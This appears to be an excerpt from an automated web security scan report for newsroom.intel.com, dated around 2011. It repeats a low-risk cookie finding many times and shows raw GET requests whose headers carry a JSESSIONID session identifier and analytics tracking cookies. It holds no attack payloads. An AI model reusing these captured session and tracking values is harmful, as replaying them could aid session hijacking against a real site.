INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/en_uk HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/en_za/ HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/es_es HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom?view=tags&tags=2nd_generation_core&recursive=false HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom/blog/2010/10/19/intel-announces-multi-billion-dollar-investment-in-next-generation-manufacturing-in-us HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom/blog/2011/01/26/forty-young-innovators-named-intel-science-talent-search-2011-finalists HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom/free_press/ HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/pt_br HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; 